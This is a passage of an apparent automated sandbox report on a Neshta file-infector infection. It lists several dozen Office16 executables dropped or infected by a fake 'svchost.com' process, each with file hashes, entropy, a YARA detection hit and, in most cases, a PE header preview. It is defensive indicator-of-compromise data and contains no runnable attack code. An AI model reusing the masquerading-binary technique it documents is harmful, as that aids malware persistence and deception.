                                                                                                                        SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                                                                                        SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.268163712816429
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.201681837230837
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352529349012904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.46773744909196
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
MD5:F3279F5053B3112B5299C08136AE58E9
SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.4135504331115705
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
MD5:A937F48D8198AB59DF93A63E834C4AAF
SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.344917752925491
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
MD5:EA546BBE947027BA147DE2719F53D051
SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.464347380493513
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
MD5:072EDD1A5D3A99C26EA9987890989B31
SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.4498443082331764
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
MD5:187B658322698CB74D48476EB2ECB171
SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.336782734218808
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
MD5:A3977FA0A7C20B05EC69FADE4F852D71
SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.531432224892055
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
MD5:A651847108A83A8B2A3B75A66403B0DC
SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):5.556968630457308
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
MD5:FB0697C512E65305CF24EFA18EC58086
SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):5.131108501135707
Encrypted:false
SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.254281392784178
Encrypted:false
SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
MD5:D7BF211CED7D30A27312CE4DA2487EE1
SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.369176164130001
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.694866680260046
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.511827025814232
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.361986604416892
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.56237653560924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.388189611386593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131620925268659
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4980851403396676
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
SHA-256: 3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
